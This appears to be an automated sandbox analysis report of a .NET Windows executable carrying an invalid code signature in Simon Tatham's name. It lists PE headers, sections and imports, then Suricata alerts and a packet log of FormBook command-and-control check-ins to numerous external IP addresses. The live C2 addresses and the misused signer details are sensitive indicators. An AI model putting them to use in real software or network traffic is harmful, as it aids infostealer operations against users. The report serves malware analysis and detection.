OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/11/2018 00:00:00 08/11/2021 23:59:59
Subject Chain	CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
Version:	3
Thumbprint MD5:	DABD77E44EF6B3BB91740FA46696B779
Thumbprint SHA-1:	5B9E273CF11941FD8C6BE3F038C4797BBE884268
Thumbprint SHA-256:	4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
Serial:	7C1118CBBADC95DA3752C46E47A27438

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xd96d7	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xda000	0x1f54	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xd9c00	0x3608
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xdc000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xd7930	0x54	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xd7730	0xd7800	724c6eab0894e9a01c1e9d227e705972	False	0.7783203125	data	7.07214556369783	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xda000	0x1f54	0x2000	fe83d3111d850b92bfb718f8bc13fa92	False	0.88330078125	data	7.4001416865184195	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xdc000	0xc	0x200	c68c444766283110703e7823bce6ded1	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xda0c8	0x1ab3	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9824433065106072
RT_GROUP_ICON	0xdbb8c	0x14	data	1.05
RT_VERSION	0xdbbb0	0x3a0	data	0.41810344827586204

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-11T06:50:13.553463+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	20.12.23.50	443	192.168.2.4	49737	TCP
2024-11-11T06:50:32.007167+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	49743	67.223.118.17	80	TCP
2024-11-11T06:50:47.598867+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49744	13.248.169.48	80	TCP
2024-11-11T06:50:50.149750+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49745	13.248.169.48	80	TCP
2024-11-11T06:50:51.378264+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	20.12.23.50	443	192.168.2.4	49746	TCP
2024-11-11T06:50:52.689922+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49747	13.248.169.48	80	TCP
2024-11-11T06:50:55.257323+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	49748	13.248.169.48	80	TCP
2024-11-11T06:51:00.727220+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49785	13.248.169.48	80	TCP
2024-11-11T06:51:04.230809+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49806	13.248.169.48	80	TCP
2024-11-11T06:51:05.815879+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49822	13.248.169.48	80	TCP
2024-11-11T06:51:08.383809+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	49843	13.248.169.48	80	TCP
2024-11-11T06:51:13.963713+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49888	199.59.243.227	80	TCP
2024-11-11T06:51:16.515789+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49910	199.59.243.227	80	TCP
2024-11-11T06:51:19.075470+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49931	199.59.243.227	80	TCP
2024-11-11T06:51:21.610890+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	49952	199.59.243.227	80	TCP
2024-11-11T06:51:27.087292+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49993	3.33.130.190	80	TCP
2024-11-11T06:51:29.640680+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50014	3.33.130.190	80	TCP
2024-11-11T06:51:32.187920+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50024	3.33.130.190	80	TCP
2024-11-11T06:51:34.727769+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50025	3.33.130.190	80	TCP
2024-11-11T06:51:40.553609+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50026	162.0.211.143	80	TCP
2024-11-11T06:51:43.163727+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50027	162.0.211.143	80	TCP
2024-11-11T06:51:45.693632+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50028	162.0.211.143	80	TCP
2024-11-11T06:51:48.200322+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50029	162.0.211.143	80	TCP
2024-11-11T06:51:54.176231+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50030	84.32.84.32	80	TCP
2024-11-11T06:51:56.722469+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50031	84.32.84.32	80	TCP
2024-11-11T06:51:59.667227+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50032	84.32.84.32	80	TCP
2024-11-11T06:52:02.332615+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50033	84.32.84.32	80	TCP
2024-11-11T06:52:08.098973+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50034	199.59.243.227	80	TCP
2024-11-11T06:52:10.643077+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50035	199.59.243.227	80	TCP
2024-11-11T06:52:13.228787+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50036	199.59.243.227	80	TCP
2024-11-11T06:52:15.765419+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50037	199.59.243.227	80	TCP
2024-11-11T06:52:21.246590+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50038	3.33.130.190	80	TCP
2024-11-11T06:52:23.939248+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50039	3.33.130.190	80	TCP
2024-11-11T06:52:26.479156+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50040	3.33.130.190	80	TCP
2024-11-11T06:52:29.031855+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50041	3.33.130.190	80	TCP
2024-11-11T06:52:35.284303+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50042	154.23.184.141	80	TCP
2024-11-11T06:52:37.994818+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50043	154.23.184.141	80	TCP
2024-11-11T06:52:40.396755+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50044	154.23.184.141	80	TCP
2024-11-11T06:52:42.967462+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50045	154.23.184.141	80	TCP
2024-11-11T06:52:49.315188+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50046	38.47.233.52	80	TCP
2024-11-11T06:52:51.926518+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50047	38.47.233.52	80	TCP
2024-11-11T06:52:54.411404+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50048	38.47.233.52	80	TCP
2024-11-11T06:52:57.080388+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50049	38.47.233.52	80	TCP
2024-11-11T06:53:02.821125+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50050	188.114.97.3	80	TCP
2024-11-11T06:53:05.446211+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50051	188.114.97.3	80	TCP
2024-11-11T06:53:07.961458+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50052	188.114.97.3	80	TCP
2024-11-11T06:53:10.532111+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50053	188.114.97.3	80	TCP
2024-11-11T06:53:16.455858+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50054	38.55.215.72	80	TCP
2024-11-11T06:53:19.033236+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50055	38.55.215.72	80	TCP
2024-11-11T06:53:21.533159+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50056	38.55.215.72	80	TCP
2024-11-11T06:53:24.067763+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50057	38.55.215.72	80	TCP
2024-11-11T06:53:30.267340+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50058	154.23.184.95	80	TCP
2024-11-11T06:53:32.815454+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50059	154.23.184.95	80	TCP
2024-11-11T06:53:35.360953+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50060	154.23.184.95	80	TCP
2024-11-11T06:53:37.911335+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50061	154.23.184.95	80	TCP
2024-11-11T06:53:43.734955+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50062	172.67.217.176	80	TCP
2024-11-11T06:53:46.264188+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50063	172.67.217.176	80	TCP
2024-11-11T06:53:48.809916+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50064	172.67.217.176	80	TCP
2024-11-11T06:53:51.372021+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50065	172.67.217.176	80	TCP
2024-11-11T06:53:57.579218+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50066	206.119.82.172	80	TCP
2024-11-11T06:54:00.110406+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50067	206.119.82.172	80	TCP
2024-11-11T06:54:02.782246+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50068	206.119.82.172	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 11, 2024 06:50:31.393903017 CET	49743	80	192.168.2.4	67.223.118.17
Nov 11, 2024 06:50:31.398734093 CET	80	49743	67.223.118.17	192.168.2.4
Nov 11, 2024 06:50:31.398812056 CET	49743	80	192.168.2.4	67.223.118.17
Nov 11, 2024 06:50:31.406601906 CET	49743	80	192.168.2.4	67.223.118.17
Nov 11, 2024 06:50:31.411386967 CET	80	49743	67.223.118.17	192.168.2.4
Nov 11, 2024 06:50:32.006899118 CET	80	49743	67.223.118.17	192.168.2.4
Nov 11, 2024 06:50:32.006910086 CET	80	49743	67.223.118.17	192.168.2.4
Nov 11, 2024 06:50:32.006920099 CET	80	49743	67.223.118.17	192.168.2.4
Nov 11, 2024 06:50:32.006930113 CET	80	49743	67.223.118.17	192.168.2.4
Nov 11, 2024 06:50:32.006941080 CET	80	49743	67.223.118.17	192.168.2.4
Nov 11, 2024 06:50:32.006944895 CET	80	49743	67.223.118.17	192.168.2.4
Nov 11, 2024 06:50:32.006953955 CET	80	49743	67.223.118.17	192.168.2.4
Nov 11, 2024 06:50:32.006963015 CET	80	49743	67.223.118.17	192.168.2.4
Nov 11, 2024 06:50:32.006973982 CET	80	49743	67.223.118.17	192.168.2.4
Nov 11, 2024 06:50:32.007167101 CET	49743	80	192.168.2.4	67.223.118.17
Nov 11, 2024 06:50:32.007340908 CET	49743	80	192.168.2.4	67.223.118.17
Nov 11, 2024 06:50:32.097944975 CET	80	49743	67.223.118.17	192.168.2.4
Nov 11, 2024 06:50:32.098319054 CET	49743	80	192.168.2.4	67.223.118.17
Nov 11, 2024 06:50:32.102941036 CET	49743	80	192.168.2.4	67.223.118.17
Nov 11, 2024 06:50:32.107723951 CET	80	49743	67.223.118.17	192.168.2.4
Nov 11, 2024 06:50:47.161444902 CET	49744	80	192.168.2.4	13.248.169.48
Nov 11, 2024 06:50:47.166279078 CET	80	49744	13.248.169.48	192.168.2.4
Nov 11, 2024 06:50:47.166359901 CET	49744	80	192.168.2.4	13.248.169.48
Nov 11, 2024 06:50:47.177680016 CET	49744	80	192.168.2.4	13.248.169.48
Nov 11, 2024 06:50:47.182473898 CET	80	49744	13.248.169.48	192.168.2.4
Nov 11, 2024 06:50:47.598807096 CET	80	49744	13.248.169.48	192.168.2.4
Nov 11, 2024 06:50:47.598866940 CET	49744	80	192.168.2.4	13.248.169.48
Nov 11, 2024 06:50:48.691509962 CET	49744	80	192.168.2.4	13.248.169.48
Nov 11, 2024 06:50:48.696312904 CET	80	49744	13.248.169.48	192.168.2.4
Nov 11, 2024 06:50:49.709356070 CET	49745	80	192.168.2.4	13.248.169.48
Nov 11, 2024 06:50:49.714339972 CET	80	49745	13.248.169.48	192.168.2.4
Nov 11, 2024 06:50:49.714423895 CET	49745	80	192.168.2.4	13.248.169.48
Nov 11, 2024 06:50:49.723359108 CET	49745	80	192.168.2.4	13.248.169.48
Nov 11, 2024 06:50:49.728220940 CET	80	49745	13.248.169.48	192.168.2.4
Nov 11, 2024 06:50:50.149674892 CET	80	49745	13.248.169.48	192.168.2.4
Nov 11, 2024 06:50:50.149749994 CET	49745	80	192.168.2.4	13.248.169.48
Nov 11, 2024 06:50:51.238070011 CET	49745	80	192.168.2.4	13.248.169.48
Nov 11, 2024 06:50:51.243135929 CET	80	49745	13.248.169.48	192.168.2.4
Nov 11, 2024 06:50:52.256580114 CET	49747	80	192.168.2.4	13.248.169.48
Nov 11, 2024 06:50:52.261478901 CET	80	49747	13.248.169.48	192.168.2.4
Nov 11, 2024 06:50:52.261564970 CET	49747	80	192.168.2.4	13.248.169.48
Nov 11, 2024 06:50:52.272842884 CET	49747	80	192.168.2.4	13.248.169.48
Nov 11, 2024 06:50:52.278214931 CET	80	49747	13.248.169.48	192.168.2.4
Nov 11, 2024 06:50:52.278237104 CET	80	49747	13.248.169.48	192.168.2.4
Nov 11, 2024 06:50:52.278254032 CET	80	49747	13.248.169.48	192.168.2.4
Nov 11, 2024 06:50:52.278264046 CET	80	49747	13.248.169.48	192.168.2.4
Nov 11, 2024 06:50:52.278312922 CET	80	49747	13.248.169.48	192.168.2.4
Nov 11, 2024 06:50:52.278321981 CET	80	49747	13.248.169.48	192.168.2.4
Nov 11, 2024 06:50:52.278759956 CET	80	49747	13.248.169.48	192.168.2.4
Nov 11, 2024 06:50:52.278776884 CET	80	49747	13.248.169.48	192.168.2.4
Nov 11, 2024 06:50:52.278789043 CET	80	49747	13.248.169.48	192.168.2.4
Nov 11, 2024 06:50:52.689860106 CET	80	49747	13.248.169.48	192.168.2.4
Nov 11, 2024 06:50:52.689922094 CET	49747	80	192.168.2.4	13.248.169.48
Nov 11, 2024 06:50:53.785401106 CET	49747	80	192.168.2.4	13.248.169.48
Nov 11, 2024 06:50:53.790127993 CET	80	49747	13.248.169.48	192.168.2.4
Nov 11, 2024 06:50:54.804670095 CET	49748	80	192.168.2.4	13.248.169.48
Nov 11, 2024 06:50:54.811224937 CET	80	49748	13.248.169.48	192.168.2.4
Nov 11, 2024 06:50:54.811330080 CET	49748	80	192.168.2.4	13.248.169.48
Nov 11, 2024 06:50:54.819324970 CET	49748	80	192.168.2.4	13.248.169.48
Nov 11, 2024 06:50:54.824129105 CET	80	49748	13.248.169.48	192.168.2.4
Nov 11, 2024 06:50:55.249526024 CET	80	49748	13.248.169.48	192.168.2.4
Nov 11, 2024 06:50:55.257211924 CET	80	49748	13.248.169.48	192.168.2.4
Nov 11, 2024 06:50:55.257323027 CET	49748	80	192.168.2.4	13.248.169.48
Nov 11, 2024 06:50:55.258061886 CET	49748	80	192.168.2.4	13.248.169.48
Nov 11, 2024 06:50:55.264086008 CET	80	49748	13.248.169.48	192.168.2.4
Nov 11, 2024 06:51:00.288912058 CET	49785	80	192.168.2.4	13.248.169.48
Nov 11, 2024 06:51:00.293729067 CET	80	49785	13.248.169.48	192.168.2.4
Nov 11, 2024 06:51:00.293803930 CET	49785	80	192.168.2.4	13.248.169.48
Nov 11, 2024 06:51:00.302608013 CET	49785	80	192.168.2.4	13.248.169.48
Nov 11, 2024 06:51:00.307701111 CET	80	49785	13.248.169.48	192.168.2.4
Nov 11, 2024 06:51:00.727137089 CET	80	49785	13.248.169.48	192.168.2.4
Nov 11, 2024 06:51:00.727220058 CET	49785	80	192.168.2.4	13.248.169.48
Nov 11, 2024 06:51:01.817616940 CET	49785	80	192.168.2.4	13.248.169.48
Nov 11, 2024 06:51:01.822488070 CET	80	49785	13.248.169.48	192.168.2.4
Nov 11, 2024 06:51:02.834440947 CET	49806	80	192.168.2.4	13.248.169.48
Nov 11, 2024 06:51:02.839308023 CET	80	49806	13.248.169.48	192.168.2.4
Nov 11, 2024 06:51:02.839479923 CET	49806	80	192.168.2.4	13.248.169.48
Nov 11, 2024 06:51:02.848359108 CET	49806	80	192.168.2.4	13.248.169.48
Nov 11, 2024 06:51:02.853282928 CET	80	49806	13.248.169.48	192.168.2.4
Nov 11, 2024 06:51:04.230737925 CET	80	49806	13.248.169.48	192.168.2.4
Nov 11, 2024 06:51:04.230808973 CET	49806	80	192.168.2.4	13.248.169.48
Nov 11, 2024 06:51:04.230871916 CET	80	49806	13.248.169.48	192.168.2.4
Nov 11, 2024 06:51:04.230921984 CET	49806	80	192.168.2.4	13.248.169.48
Nov 11, 2024 06:51:04.230922937 CET	80	49806	13.248.169.48	192.168.2.4
Nov 11, 2024 06:51:04.230969906 CET	49806	80	192.168.2.4	13.248.169.48
Nov 11, 2024 06:51:04.231398106 CET	80	49806	13.248.169.48	192.168.2.4
Nov 11, 2024 06:51:04.231440067 CET	49806	80	192.168.2.4	13.248.169.48
Nov 11, 2024 06:51:04.363141060 CET	49806	80	192.168.2.4	13.248.169.48
Nov 11, 2024 06:51:04.367919922 CET	80	49806	13.248.169.48	192.168.2.4
Nov 11, 2024 06:51:05.381633997 CET	49822	80	192.168.2.4	13.248.169.48
Nov 11, 2024 06:51:05.386430025 CET	80	49822	13.248.169.48	192.168.2.4
Nov 11, 2024 06:51:05.386514902 CET	49822	80	192.168.2.4	13.248.169.48
Nov 11, 2024 06:51:05.397701979 CET	49822	80	192.168.2.4	13.248.169.48
Nov 11, 2024 06:51:05.402730942 CET	80	49822	13.248.169.48	192.168.2.4
Nov 11, 2024 06:51:05.402776957 CET	80	49822	13.248.169.48	192.168.2.4
Nov 11, 2024 06:51:05.402798891 CET	80	49822	13.248.169.48	192.168.2.4
Nov 11, 2024 06:51:05.402812958 CET	80	49822	13.248.169.48	192.168.2.4
Nov 11, 2024 06:51:05.402827024 CET	80	49822	13.248.169.48	192.168.2.4
Nov 11, 2024 06:51:05.402837992 CET	80	49822	13.248.169.48	192.168.2.4
Nov 11, 2024 06:51:05.402873993 CET	80	49822	13.248.169.48	192.168.2.4
Nov 11, 2024 06:51:05.402882099 CET	80	49822	13.248.169.48	192.168.2.4
Nov 11, 2024 06:51:05.402885914 CET	80	49822	13.248.169.48	192.168.2.4
Nov 11, 2024 06:51:05.815808058 CET	80	49822	13.248.169.48	192.168.2.4
Nov 11, 2024 06:51:05.815879107 CET	49822	80	192.168.2.4	13.248.169.48
Nov 11, 2024 06:51:06.915390968 CET	49822	80	192.168.2.4	13.248.169.48
Nov 11, 2024 06:51:06.921108961 CET	80	49822	13.248.169.48	192.168.2.4
Nov 11, 2024 06:51:07.928770065 CET	49843	80	192.168.2.4	13.248.169.48
Nov 11, 2024 06:51:07.933733940 CET	80	49843	13.248.169.48	192.168.2.4
Nov 11, 2024 06:51:07.933845043 CET	49843	80	192.168.2.4	13.248.169.48
Nov 11, 2024 06:51:07.941097975 CET	49843	80	192.168.2.4	13.248.169.48
Nov 11, 2024 06:51:07.946001053 CET	80	49843	13.248.169.48	192.168.2.4
Nov 11, 2024 06:51:08.375952005 CET	80	49843	13.248.169.48	192.168.2.4
Nov 11, 2024 06:51:08.382822990 CET	80	49843	13.248.169.48	192.168.2.4
Nov 11, 2024 06:51:08.383809090 CET	49843	80	192.168.2.4	13.248.169.48
Nov 11, 2024 06:51:08.384762049 CET	49843	80	192.168.2.4	13.248.169.48
Nov 11, 2024 06:51:08.389519930 CET	80	49843	13.248.169.48	192.168.2.4
Nov 11, 2024 06:51:13.534019947 CET	49888	80	192.168.2.4	199.59.243.227
Nov 11, 2024 06:51:13.538840055 CET	80	49888	199.59.243.227	192.168.2.4
Nov 11, 2024 06:51:13.538927078 CET	49888	80	192.168.2.4	199.59.243.227
Nov 11, 2024 06:51:13.557723999 CET	49888	80	192.168.2.4	199.59.243.227
Nov 11, 2024 06:51:13.562597990 CET	80	49888	199.59.243.227	192.168.2.4
Nov 11, 2024 06:51:13.963620901 CET	80	49888	199.59.243.227	192.168.2.4
Nov 11, 2024 06:51:13.963634968 CET	80	49888	199.59.243.227	192.168.2.4
Nov 11, 2024 06:51:13.963712931 CET	49888	80	192.168.2.4	199.59.243.227
Nov 11, 2024 06:51:13.969525099 CET	80	49888	199.59.243.227	192.168.2.4
Nov 11, 2024 06:51:13.969595909 CET	49888	80	192.168.2.4	199.59.243.227
Nov 11, 2024 06:51:15.066252947 CET	49888	80	192.168.2.4	199.59.243.227
Nov 11, 2024 06:51:16.085285902 CET	49910	80	192.168.2.4	199.59.243.227
Nov 11, 2024 06:51:16.090158939 CET	80	49910	199.59.243.227	192.168.2.4
Nov 11, 2024 06:51:16.090229034 CET	49910	80	192.168.2.4	199.59.243.227
Nov 11, 2024 06:51:16.100064039 CET	49910	80	192.168.2.4	199.59.243.227
Nov 11, 2024 06:51:16.104867935 CET	80	49910	199.59.243.227	192.168.2.4
Nov 11, 2024 06:51:16.515707016 CET	80	49910	199.59.243.227	192.168.2.4
Nov 11, 2024 06:51:16.515721083 CET	80	49910	199.59.243.227	192.168.2.4
Nov 11, 2024 06:51:16.515789032 CET	49910	80	192.168.2.4	199.59.243.227
Nov 11, 2024 06:51:16.521239996 CET	80	49910	199.59.243.227	192.168.2.4
Nov 11, 2024 06:51:16.521413088 CET	49910	80	192.168.2.4	199.59.243.227
Nov 11, 2024 06:51:17.613162994 CET	49910	80	192.168.2.4	199.59.243.227
Nov 11, 2024 06:51:18.634454012 CET	49931	80	192.168.2.4	199.59.243.227
Nov 11, 2024 06:51:18.639291048 CET	80	49931	199.59.243.227	192.168.2.4
Nov 11, 2024 06:51:18.639368057 CET	49931	80	192.168.2.4	199.59.243.227
Nov 11, 2024 06:51:18.651823997 CET	49931	80	192.168.2.4	199.59.243.227
Nov 11, 2024 06:51:18.656718969 CET	80	49931	199.59.243.227	192.168.2.4
Nov 11, 2024 06:51:18.656727076 CET	80	49931	199.59.243.227	192.168.2.4
Nov 11, 2024 06:51:18.656754971 CET	80	49931	199.59.243.227	192.168.2.4
Nov 11, 2024 06:51:18.656763077 CET	80	49931	199.59.243.227	192.168.2.4
Nov 11, 2024 06:51:18.656817913 CET	80	49931	199.59.243.227	192.168.2.4
Nov 11, 2024 06:51:18.656841993 CET	80	49931	199.59.243.227	192.168.2.4
Nov 11, 2024 06:51:18.656891108 CET	80	49931	199.59.243.227	192.168.2.4
Nov 11, 2024 06:51:18.656900883 CET	80	49931	199.59.243.227	192.168.2.4
Nov 11, 2024 06:51:18.656908989 CET	80	49931	199.59.243.227	192.168.2.4
Nov 11, 2024 06:51:19.075390100 CET	80	49931	199.59.243.227	192.168.2.4
Nov 11, 2024 06:51:19.075403929 CET	80	49931	199.59.243.227	192.168.2.4
Nov 11, 2024 06:51:19.075469971 CET	49931	80	192.168.2.4	199.59.243.227
Nov 11, 2024 06:51:19.081289053 CET	80	49931	199.59.243.227	192.168.2.4
Nov 11, 2024 06:51:19.081334114 CET	49931	80	192.168.2.4	199.59.243.227
Nov 11, 2024 06:51:20.160053968 CET	49931	80	192.168.2.4	199.59.243.227
Nov 11, 2024 06:51:21.178915024 CET	49952	80	192.168.2.4	199.59.243.227
Nov 11, 2024 06:51:21.183763981 CET	80	49952	199.59.243.227	192.168.2.4
Nov 11, 2024 06:51:21.183856964 CET	49952	80	192.168.2.4	199.59.243.227
Nov 11, 2024 06:51:21.191828012 CET	49952	80	192.168.2.4	199.59.243.227
Nov 11, 2024 06:51:21.196638107 CET	80	49952	199.59.243.227	192.168.2.4
